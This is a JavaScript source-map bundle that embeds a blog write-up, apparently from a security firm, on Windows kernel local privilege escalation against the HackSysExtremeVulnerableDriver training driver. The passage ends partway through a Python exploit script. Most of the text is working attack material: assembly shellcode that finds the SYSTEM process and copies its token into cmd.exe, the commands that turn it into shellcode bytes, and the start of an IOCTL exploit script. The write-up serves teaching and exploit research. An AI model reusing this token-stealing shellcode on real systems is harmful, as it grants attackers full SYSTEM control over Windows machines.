{
  "version": 3,
  "sources": ["ssg:https://framerusercontent.com/modules/xkgOTPH3D819XQA1Lv94/JiQ9XamYsqUqkFHxQJvK/WJBZI1Ghk-25.js"],
  "sourcesContent": ["import{jsx as e,jsxs as t}from\"react/jsx-runtime\";import{ComponentPresetsConsumer as n,Link as r}from\"framer\";import{motion as o}from\"framer-motion\";import*as i from\"react\";import s from\"https://framerusercontent.com/modules/pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js\";export const richText=/*#__PURE__*/t(i.Fragment,{children:[/*#__PURE__*/e(\"h2\",{children:\"Security token stealing\"}),/*#__PURE__*/t(\"p\",{children:[\"When we are attacking the kernel, we are supposed to have unprivileged access to the target machine. That\u2019s why the common exploit goal is to perform Local Privilege Escalation which means to get full privileges on the OS. There are \",/*#__PURE__*/e(r,{href:\"https://securityintelligence.com/identifying-named-pipe-impersonation-and-other-malicious-privilege-escalation-techniques/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"several methods\"})}),\" that can be used to do that. Most of them (ab)use the privilege model implemented by Windows.\"]}),/*#__PURE__*/t(\"p\",{children:[\"In Windows, when the system starts, a process called \",/*#__PURE__*/e(\"code\",{children:\"System\"}),\" is created, always with \",/*#__PURE__*/e(\"code\",{children:\"PID\"}),\" 4. As this process is owned by the \",/*#__PURE__*/e(\"code\",{children:\"SYSTEM\"}),\" user, we will use this as the target process to steal the ticket from.\"]}),/*#__PURE__*/e(\"img\",{alt:\"NT Kernel & System\",className:\"framer-image\",height:\"403\",src:\"https://framerusercontent.com/images/KMkE322VX7vmFWkh10D0uPkNKhc.png\",srcSet:\"https://framerusercontent.com/images/KMkE322VX7vmFWkh10D0uPkNKhc.png?scale-down-to=512 512w,https://framerusercontent.com/images/KMkE322VX7vmFWkh10D0uPkNKhc.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/KMkE322VX7vmFWkh10D0uPkNKhc.png 1920w\",style:{aspectRatio:\"1920 / 806\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"Each process has a \",/*#__PURE__*/e(\"code\",{children:\"EPROCESS\"}),\" structure.\"]}),/*#__PURE__*/e(\"img\",{alt:\"EPROCESS structure\",className:\"framer-image\",height:\"463\",src:\"https://framerusercontent.com/images/W6BIGD2vdQMoLyaBZH06uTOuujs.png\",srcSet:\"https://framerusercontent.com/images/W6BIGD2vdQMoLyaBZH06uTOuujs.png?scale-down-to=512 512w,https://framerusercontent.com/images/W6BIGD2vdQMoLyaBZH06uTOuujs.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/W6BIGD2vdQMoLyaBZH06uTOuujs.png 1920w\",style:{aspectRatio:\"1920 / 926\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"One of the members of that structure is \",/*#__PURE__*/e(\"code\",{children:\"Token\"}),\" which is a ticket granted by the \",/*#__PURE__*/e(\"code\",{children:\"LSASS\"}),\" process.\"]}),/*#__PURE__*/e(\"img\",{alt:\"Token LSASS\",className:\"framer-image\",height:\"205\",src:\"https://framerusercontent.com/images/7c19RFBdwkTgBKw51aljDk9M4TI.png\",srcSet:\"https://framerusercontent.com/images/7c19RFBdwkTgBKw51aljDk9M4TI.png?scale-down-to=512 512w,https://framerusercontent.com/images/7c19RFBdwkTgBKw51aljDk9M4TI.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/7c19RFBdwkTgBKw51aljDk9M4TI.png 1920w\",style:{aspectRatio:\"1920 / 410\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"The token is used to perform operations on the system based on the permissions granted to it. For example, if a process wants to read a file, that file security descriptor will check if the token of process has the permissions to do it. This is what is known as Discretionary Access Control List or \",/*#__PURE__*/e(\"code\",{children:\"DACL\"}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"In Windows, the \",/*#__PURE__*/e(\"code\",{children:\"SYSTEM\"}),\" token has all the permissions granted on all the system objects (files, processes, devices, pipes, etc). That\u2019s why, if we are able to steal that token and insert it to a non-privileged process, that process will gain \",/*#__PURE__*/e(\"code\",{children:\"SYSTEM\"}),\" privileges.\"]}),/*#__PURE__*/t(\"p\",{children:[\"To do that, we first need to get the offset of the \",/*#__PURE__*/e(\"code\",{children:\"Token\"}),\" field in the \",/*#__PURE__*/e(\"code\",{children:\"EPROCESS\"}),\" structure:\"]}),/*#__PURE__*/e(\"img\",{alt:\"Get the offset of EPROCESS\",className:\"framer-image\",height:\"88\",src:\"https://framerusercontent.com/images/baf2zLbLsm4qkOzwPmzoks564QU.png\",srcSet:\"https://framerusercontent.com/images/baf2zLbLsm4qkOzwPmzoks564QU.png?scale-down-to=512 512w,https://framerusercontent.com/images/baf2zLbLsm4qkOzwPmzoks564QU.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/baf2zLbLsm4qkOzwPmzoks564QU.png 1920w\",style:{aspectRatio:\"1920 / 176\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"As you see, it is at \",/*#__PURE__*/e(\"code\",{children:\"_EPROCESS+0x0fc\"}),\". With that, we need to get the \",/*#__PURE__*/e(\"code\",{children:\"SYSTEM\"}),\" process descriptor:\"]}),/*#__PURE__*/e(\"img\",{alt:\"Get SYSTEM process descriptor\",className:\"framer-image\",height:\"118\",src:\"https://framerusercontent.com/images/2YA5adXpnPrYHmmZAmIcuKzxhUY.png\",srcSet:\"https://framerusercontent.com/images/2YA5adXpnPrYHmmZAmIcuKzxhUY.png?scale-down-to=512 512w,https://framerusercontent.com/images/2YA5adXpnPrYHmmZAmIcuKzxhUY.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/2YA5adXpnPrYHmmZAmIcuKzxhUY.png 1916w\",style:{aspectRatio:\"1916 / 236\"},width:\"958\"}),/*#__PURE__*/t(\"p\",{children:[\"Then, we need to get the value of the token for the \",/*#__PURE__*/e(\"code\",{children:\"SYSTEM\"}),\" process:\"]}),/*#__PURE__*/e(\"img\",{alt:\"SYSTEM process token\",className:\"framer-image\",height:\"64\",src:\"https://framerusercontent.com/images/4PHXm36N6N2bNjZZUyyYe4pnKU.png\",srcSet:\"https://framerusercontent.com/images/4PHXm36N6N2bNjZZUyyYe4pnKU.png?scale-down-to=512 512w,https://framerusercontent.com/images/4PHXm36N6N2bNjZZUyyYe4pnKU.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/4PHXm36N6N2bNjZZUyyYe4pnKU.png 1920w\",style:{aspectRatio:\"1920 / 128\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"Now, we launch a \",/*#__PURE__*/e(\"code\",{children:\"cmd.exe\"}),\" process on the target OS and get the current privileges:\"]}),/*#__PURE__*/e(\"img\",{alt:\"Obtaining privileges\",className:\"framer-image\",height:\"269\",src:\"https://framerusercontent.com/images/CF8fmUafZgVnWpsH5yLTmXOpwV4.png\",srcSet:\"https://framerusercontent.com/images/CF8fmUafZgVnWpsH5yLTmXOpwV4.png?scale-down-to=512 512w,https://framerusercontent.com/images/CF8fmUafZgVnWpsH5yLTmXOpwV4.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/CF8fmUafZgVnWpsH5yLTmXOpwV4.png 1920w\",style:{aspectRatio:\"1920 / 538\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"We must get the \",/*#__PURE__*/e(\"code\",{children:\"cmd.exe\"}),\" process descriptor:\"]}),/*#__PURE__*/e(\"img\",{alt:\"cmd process descriptor\",className:\"framer-image\",height:\"107\",src:\"https://framerusercontent.com/images/IYhDsUZCNazzMcxbl6KE7KyNEY.png\",srcSet:\"https://framerusercontent.com/images/IYhDsUZCNazzMcxbl6KE7KyNEY.png?scale-down-to=512 512w,https://framerusercontent.com/images/IYhDsUZCNazzMcxbl6KE7KyNEY.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/IYhDsUZCNazzMcxbl6KE7KyNEY.png 1920w\",style:{aspectRatio:\"1920 / 214\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"Finally, we must copy the value of the token of the \",/*#__PURE__*/e(\"code\",{children:\"SYSTEM\"}),\" process to the \",/*#__PURE__*/e(\"code\",{children:\"cmd.exe\"}),\" process. Let\u2019s see it in action:\"]}),/*#__PURE__*/e(\"img\",{alt:\"Copying token to cmd\",className:\"framer-image\",height:\"656\",src:\"https://framerusercontent.com/images/Tm9PEnPptRUVnmMLg3vWbieQk.gif\",srcSet:\"https://framerusercontent.com/images/Tm9PEnPptRUVnmMLg3vWbieQk.gif?scale-down-to=1024 906w,https://framerusercontent.com/images/Tm9PEnPptRUVnmMLg3vWbieQk.gif 1162w\",style:{aspectRatio:\"1162 / 1312\"},width:\"581\"}),/*#__PURE__*/t(\"p\",{children:[\"Wonderful! As you can see, our \",/*#__PURE__*/e(\"code\",{children:\"cmd.exe\"}),\" is now running as \",/*#__PURE__*/e(\"code\",{children:\"nt authority\\\\system\"}),\"!\"]}),/*#__PURE__*/t(\"p\",{children:[\"_____\",/*#__PURE__*/e(\"br\",{}),/*#__PURE__*/e(\"br\",{}),\"\u26A0\uFE0F \",/*#__PURE__*/e(\"strong\",{children:\" \"}),/*#__PURE__*/t(\"em\",{children:[/*#__PURE__*/e(\"strong\",{children:\"Note: \"}),\"We need to remember that the offsets described in this article are only applicable for the Windows version that we are currently using: Windows 10 1703 32 bits.\",/*#__PURE__*/t(\"strong\",{children:[/*#__PURE__*/e(\"br\",{}),/*#__PURE__*/e(\"br\",{})]})]}),\"_____\"]}),/*#__PURE__*/e(\"p\",{children:\"Now, we must make this process programmatically if we want to include it in our exploit. The strategy is the following:\"}),/*#__PURE__*/t(\"ul\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Look for a fixed starting point that we can use to calculate offsets, using position-independent code.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Get the current process list.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"Find the \",/*#__PURE__*/e(\"code\",{children:\"cmd.exe\"}),\" process.\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"Find the \",/*#__PURE__*/e(\"code\",{children:\"SYSTEM\"}),\" process (with \",/*#__PURE__*/e(\"code\",{children:\"PID\"}),\" 4).\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"Grab the \",/*#__PURE__*/e(\"code\",{children:\"Token\"}),\" from the \",/*#__PURE__*/e(\"code\",{children:\"SYSTEM\"}),\" process.\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"Copy the token from process \",/*#__PURE__*/e(\"code\",{children:\"SYSTEM\"}),\" to the \",/*#__PURE__*/e(\"code\",{children:\"cmd.exe\"}),\" process.\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Restore execution.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Enjoy.\"})})]}),/*#__PURE__*/t(\"p\",{children:[\"The first step is to find a fixed position from where we can get the required structures as an offset. According to \",/*#__PURE__*/e(r,{href:\"https://en.wikipedia.org/wiki/Win32_Thread_Information_Block\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"this entry\"})}),\", we can access the \",/*#__PURE__*/e(\"code\",{children:\"_NT_TIB\"}),\" structure from the \",/*#__PURE__*/e(\"code\",{children:\"fs\"}),\" segment selector. This structure holds information of the current running thread (in our case, that would be the exploit). The article also says that we can reach the \",/*#__PURE__*/e(\"code\",{children:\"_KTHREAD\"}),\" structure at \",/*#__PURE__*/e(\"code\",{children:\"fs+0x124\"}),\". With that, we can start writing some assembler:\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"pushad                                  ; Save current registers\\nmov eax, dword fs:[0x124]               ; EAX now points to _KTHREAD\",language:\"Markdown\"})})}),/*#__PURE__*/t(\"p\",{children:[\"In the \",/*#__PURE__*/e(\"code\",{children:\"_KTHREAD\"}),\" structure we can find an offset to the \",/*#__PURE__*/e(\"code\",{children:\"_KPROCESS\"}),\".\"]}),/*#__PURE__*/e(\"img\",{alt:\"_KTHREAD Process\",className:\"framer-image\",height:\"93\",src:\"https://framerusercontent.com/images/fr8u8SlCphNUK2D4KpgXqphDBSM.png\",srcSet:\"https://framerusercontent.com/images/fr8u8SlCphNUK2D4KpgXqphDBSM.png?scale-down-to=512 512w,https://framerusercontent.com/images/fr8u8SlCphNUK2D4KpgXqphDBSM.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/fr8u8SlCphNUK2D4KpgXqphDBSM.png 1920w\",style:{aspectRatio:\"1920 / 186\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"It turns out that \",/*#__PURE__*/e(\"code\",{children:\"_KPROCESS\"}),\" is the first field of \",/*#__PURE__*/e(\"code\",{children:\"_EPROCESS\"}),\", which means that we can access the \",/*#__PURE__*/e(\"code\",{children:\"_EPROCESS\"}),\" structure at \",/*#__PURE__*/e(\"code\",{children:\"_KTHREAD+0x150\"}),\":\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"pushad                                  ; Save current registers\\nmov eax, dword fs:[0x124]               ; EAX now points to _KTHREAD\\nmov eax, dword [eax+0x150]              ; EAX now points to _EPROCESS\",language:\"Markdown\"})})}),/*#__PURE__*/t(\"p\",{children:[\"The \",/*#__PURE__*/e(\"code\",{children:\"_EPROCESS\"}),\" structure holds the required offsets to the other needed information:\"]}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"_EPROCESS+0x0b8\"}),\" points to \",/*#__PURE__*/e(\"code\",{children:\"ActiveProcessLinks\"}),\" which is a linked list holding the current running processes, and \",/*#__PURE__*/e(\"code\",{children:\"_EPROCESS+0x0b4\"}),\" points to the current process \",/*#__PURE__*/e(\"code\",{children:\"PID\"}),\":\"]})})}),/*#__PURE__*/e(\"img\",{alt:\"Current PID\",className:\"framer-image\",height:\"103\",src:\"https://framerusercontent.com/images/YZrEIYrTPZD2ldm85ItPKl3Vuw.png\",srcSet:\"https://framerusercontent.com/images/YZrEIYrTPZD2ldm85ItPKl3Vuw.png?scale-down-to=512 512w,https://framerusercontent.com/images/YZrEIYrTPZD2ldm85ItPKl3Vuw.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/YZrEIYrTPZD2ldm85ItPKl3Vuw.png 1920w\",style:{aspectRatio:\"1920 / 206\"},width:\"960\"}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"_EPROCESS+0x140\"}),\" points to \",/*#__PURE__*/e(\"code\",{children:\"InheritedFromUniqueProcessId\"}),\" which will contain the \",/*#__PURE__*/e(\"code\",{children:\"PID\"}),\" of the parent process, in our case the \",/*#__PURE__*/e(\"code\",{children:\"PID\"}),\" of \",/*#__PURE__*/e(\"code\",{children:\"cmd.exe\"}),\":\"]})})}),/*#__PURE__*/e(\"img\",{alt:\"Parent Process PID\",className:\"framer-image\",height:\"88\",src:\"https://framerusercontent.com/images/km3DvrGFR7E7rDCCWgn2aYnKr4.png\",srcSet:\"https://framerusercontent.com/images/km3DvrGFR7E7rDCCWgn2aYnKr4.png?scale-down-to=512 512w,https://framerusercontent.com/images/km3DvrGFR7E7rDCCWgn2aYnKr4.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/km3DvrGFR7E7rDCCWgn2aYnKr4.png 1920w\",style:{aspectRatio:\"1920 / 176\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"With that, we need to save the \",/*#__PURE__*/e(\"code\",{children:\"PID\"}),\" of \",/*#__PURE__*/e(\"code\",{children:\"cmd.exe\"}),\":\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"pushad                                  ; Save current registers\\nmov eax, dword fs:[0x124]               ; EAX now points to _KTHREAD\\nmov eax, dword [eax+0x150]              ; EAX now points to _EPROCESS\\nmov edx, dword [eax+0x140]              ; EDX now points to cmd.exe PID\",language:\"Markdown\"})})}),/*#__PURE__*/t(\"p\",{children:[\"Now we need to traverse the \",/*#__PURE__*/e(\"code\",{children:\"ActiveProcessLinks\"}),\" list to find the \",/*#__PURE__*/e(\"code\",{children:\"_EPROCESS\"}),\" structure for the \",/*#__PURE__*/e(\"code\",{children:\"cmd.exe\"}),\" process:\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"pushad                                  ; Save current registers\\nmov eax, dword [fs:0x124]               ; EAX now points to _KTHREAD\\nmov eax, dword [eax+0x150]              ; EAX now points to _EPROCESS\\nmov edx, dword [eax+0x140]              ; EDX now points to cmd.exe PID\\nmov ecx, eax                            ; ECX will be used to iterate over ActiveProcessLinks\\nfind_cmd:\\nmov ecx, dword [ecx+0x0b8]              ; ECX points to ActiveProcessLinks\\n                                        ; of current process\\nsub ecx, 0x0b8                          ; Point to current _EPROCESS\\ncmp dword [ecx+0x0b4], edx              ; Check if this entry belongs to `cmd.exe`\\njne find_cmd                            ; If not, go to the next entry of ActiveProcessLinks\",language:\"Markdown\"})})}),/*#__PURE__*/t(\"p\",{children:[\"Then, find the \",/*#__PURE__*/e(\"code\",{children:\"_EPROCESS\"}),\" structure for the \",/*#__PURE__*/e(\"code\",{children:\"SYSTEM\"}),\" process:\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"pushad                                  ; Save current registers\\nmov eax, dword [fs:0x124]               ; EAX now points to _KTHREAD\\nmov eax, dword [eax+0x150]              ; EAX now points to _EPROCESS\\nmov edx, dword [eax+0x140]              ; EDX now points to cmd.exe PID\\nmov ecx, eax                            ; ECX will be used to iterate over ActiveProcessLinks\\nfind_cmd:\\nmov ecx, dword [ecx+0x0b8]              ; ECX points to ActiveProcessLinks\\n                                        ; of current process\\nsub ecx, 0x0b8                          ; Point to current _EPROCESS\\ncmp dword [ecx+0x0b4], edx              ; Check if this entry belongs to `cmd.exe`\\njne find_cmd                            ; If not, go to the next entry of ActiveProcessLinks\\nmov edi, ecx                            ; EDI now points to cmd.exe _EPROCESS\\nmov ecx, eax                            ; Rewind to iterate using ECX over ActiveProcessLinks\\nfind_system:\\nmov ecx, dword [ecx+0x0b8]              ; ECX points to ActiveProcessLinks\\n                                        ; of current process\\nsub ecx, 0x0b8                          ; Point to current _EPROCESS\\ncmp dword [ecx+0x0b4], 4                ; Check if this entry belongs to PID 4 = SYSTEM\\njne find_system                         ; If not, go to the next entry of ActiveProcessLinks\",language:\"Markdown\"})})}),/*#__PURE__*/t(\"p\",{children:[\"We then must move the token from \",/*#__PURE__*/e(\"code\",{children:\"SYSTEM\"}),\" to \",/*#__PURE__*/e(\"code\",{children:\"cmd.exe\"}),\":\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"pushad                                  ; Save current registers\\nmov eax, dword [fs:0x124]               ; EAX now points to _KTHREAD\\nmov eax, dword [eax+0x150]              ; EAX now points to _EPROCESS\\nmov edx, dword [eax+0x140]              ; EDX now points to cmd.exe PID\\nmov ecx, eax                            ; ECX will be used to iterate over ActiveProcessLinks\\nfind_cmd:\\nmov ecx, dword [ecx+0x0b8]              ; ECX points to ActiveProcessLinks\\n                                        ; of current process\\nsub ecx, 0x0b8                          ; Point to current _EPROCESS\\ncmp dword [ecx+0x0b4], edx              ; Check if this entry belongs to `cmd.exe`\\njne find_cmd                            ; If not, go to the next entry of ActiveProcessLinks\\nmov edi, ecx                            ; EDI now points to cmd.exe _EPROCESS\\nmov ecx, eax                            ; Rewind to iterate using ECX over ActiveProcessLinks\\nfind_system:\\nmov ecx, dword [ecx+0x0b8]              ; ECX points to ActiveProcessLinks\\n                                        ; of current process\\nsub ecx, 0x0b8                          ; Point to current _EPROCESS\\ncmp dword [ecx+0x0b4], 4                ; Check if this entry belongs to PID 4 = SYSTEM\\njne find_system                         ; If not, go to the next entry of ActiveProcessLinks\\nadd ecx, 0x0fc                          ; ECX now points to the Token of SYSTEM\\nmov ecx, [ecx]                          ; Copy contents of Token to ECX\\nmov [edi+0x0fc], ecx                    ; Move the Token of SYSTEM to cmd.exe\",language:\"Markdown\"})})}),/*#__PURE__*/t(\"p\",{children:[\"And finally restore execution. As we are writing in the stack, we had surely mangled immediate stack frames of caller functions. If we look at the stack after executing the shellcode, we can see that there is a stack frame at which we can return to, located at \",/*#__PURE__*/e(\"code\",{children:\"esp+0x10\"}),\":\"]}),/*#__PURE__*/e(\"img\",{alt:\"esp+0x10\",className:\"framer-image\",height:\"397\",src:\"https://framerusercontent.com/images/W1KlJ1M8cPGmJhTDSqcFUNAQo.png\",srcSet:\"https://framerusercontent.com/images/W1KlJ1M8cPGmJhTDSqcFUNAQo.png?scale-down-to=512 512w,https://framerusercontent.com/images/W1KlJ1M8cPGmJhTDSqcFUNAQo.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/W1KlJ1M8cPGmJhTDSqcFUNAQo.png 1920w\",style:{aspectRatio:\"1920 / 794\"},width:\"960\"}),/*#__PURE__*/e(\"p\",{children:\"With that, we can add a restore point to our shellcode:\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"pushad\\nmov eax, dword [fs:0x124]               ; EAX now points to _KTHREAD\\nmov eax, dword [eax+0x150]              ; EAX now points to _EPROCESS\\nmov edx, dword [eax+0x140]              ; EDX now points to cmd.exe PID\\nmov ecx, eax                            ; ECX will be used to iterate over ActiveProcessLinks\\nfind_cmd:\\nmov ecx, dword [ecx+0x0b8]              ; ECX points to ActiveProcessLinks\\n                                        ; of current process\\nsub ecx, 0x0b8                          ; Point to current _EPROCESS\\ncmp dword [ecx+0x0b4], edx              ; Check if this entry belongs to `cmd.exe`\\njne find_cmd                            ; If not, go to the next entry of ActiveProcessLinks\\nmov edi, ecx                            ; EDI now points to cmd.exe _EPROCESS\\nmov ecx, eax                            ; Rewind to iterate using ECX over ActiveProcessLinks\\nfind_system:\\nmov ecx, dword [ecx+0x0b8]              ; ECX points to ActiveProcessLinks\\n                                        ; of current process\\nsub ecx, 0x0b8                          ; Point to current _EPROCESS\\ncmp dword [ecx+0x0b4], 4                ; Check if this entry belongs to PID 4 = SYSTEM\\njne find_system                         ; If not, go to the next entry of ActiveProcessLinks\\nadd ecx, 0x0fc                          ; ECX now points to the Token of SYSTEM\\nmov ecx, [ecx]                          ; Copy contents of Token to ECX\\nmov [edi+0x0fc], ecx                    ; Move the Token of SYSTEM to cmd.exe\\npopad                                   ; Restore\\nxor eax,eax\\ninc eax\\nadd esp,0x10\\npop ebp\\nret 8\",language:\"Markdown\"})})}),/*#__PURE__*/e(\"p\",{children:\"Now, we can compile that code with:\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"> nasm -f elf32 -o steal.o steal.asm\",language:\"Markdown\"})})}),/*#__PURE__*/e(\"p\",{children:\"And get the shellcode with:\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"$ for i in $(objdump -d steal.o -M intel |grep \\\"^ \\\" |cut -f2); do echo -n '\\\\x'$i; done; echo\\n\\\\x60\\\\x64\\\\xa1\\\\x24\\\\x01\\\\x00\\\\x00\\\\x8b\\\\x80\\\\x50\\\\x01\\\\x00\\\\x00\\\\x8b\\\\x90\\\\x40\\\\x01\\\\x00\\\\x00\\n\\\\x89\\\\xc1\\\\x8b\\\\x89\\\\xb8\\\\x00\\\\x00\\\\x00\\\\x81\\\\xe9\\\\xb8\\\\x00\\\\x00\\\\x00\\\\x39\\\\x91\\\\xb4\\\\x00\\\\x00\\n\\\\x00\\\\x75\\\\xec\\\\x89\\\\xcf\\\\x89\\\\xc1\\\\x8b\\\\x89\\\\xb8\\\\x00\\\\x00\\\\x00\\\\x81\\\\xe9\\\\xb8\\\\x00\\\\x00\\\\x00\\n\\\\x83\\\\xb9\\\\xb4\\\\x00\\\\x00\\\\x00\\\\x04\\\\x75\\\\xeb\\\\x81\\\\xc1\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x8b\\\\x09\\\\x89\\\\x8f\\n\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x61\\\\x31\\\\xc0\\\\x40\\\\x83\\\\xc4\\\\x10\\\\x5d\\\\xc2\\\\x08\\\\x00\",language:\"Markdown\"})})}),/*#__PURE__*/t(\"p\",{children:[\"Let\u2019s pick the exploit from the \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/hevd-smep-bypass/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"last post\"})}),\", and update the shellcode. I also added some \",/*#__PURE__*/e(\"code\",{children:\"print\"}),\" calls that helps to trace at what stage of the exploit we are now:\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"#!/usr/bin/env python3\\n\\\"\\\"\\\"\\nHackSysExtremeVulnerableDrive Stack Overflow.\\n\\nVulnerable Software: HackSysExtremeVulnerableDrive\\nVersion: 3.00\\nExploit Author: Andres Roldan\\nTested On: Windows 10 1703\\nWriteup: https://fluidattacks.com/blog/hevd-privilege-escalation/\\n\\\"\\\"\\\"\\n\\nimport struct\\nimport sys\\nfrom ctypes import windll, c_int, c_ulong, byref, sizeof\\nfrom infi.wioctl import DeviceIoControl\\n\\nKERNEL32 = windll.kernel32\\nPSAPI = windll.psapi\\nDEVICE_NAME = r'\\\\\\\\.\\\\HackSysExtremeVulnerableDriver'\\nIOCTL_HEVD_STACK_OVERFLOW = 0x222003\\n\\n\\ndef get_kernel_base():\\n    \\\"\\\"\\\"Obtain kernel base address.\\\"\\\"\\\"\\n    buff_size = 0x4\\n\\n    base = (c_ulong * buff_size)(0)\\n\\n    if not PSAPI.EnumDeviceDrivers(base, sizeof(base), byref(c_ulong())):\\n        print('Failed to get kernel base address.')\\n        sys.exit(1)\\n    return base[0]\\n\\n\\nBASE_ADDRESS = get_kernel_base()\\nprint(f'Obtained kernel base address: {hex(BASE_ADDRESS)}')\\n\\nSHELLCODE = (\\n    b'\\\\x60\\\\x64\\\\xa1\\\\x24\\\\x01\\\\x00\\\\x00\\\\x8b\\\\x80\\\\x50\\\\x01\\\\x00\\\\x00\\\\x8b\\\\x90\\\\x40\\\\x01'\\n    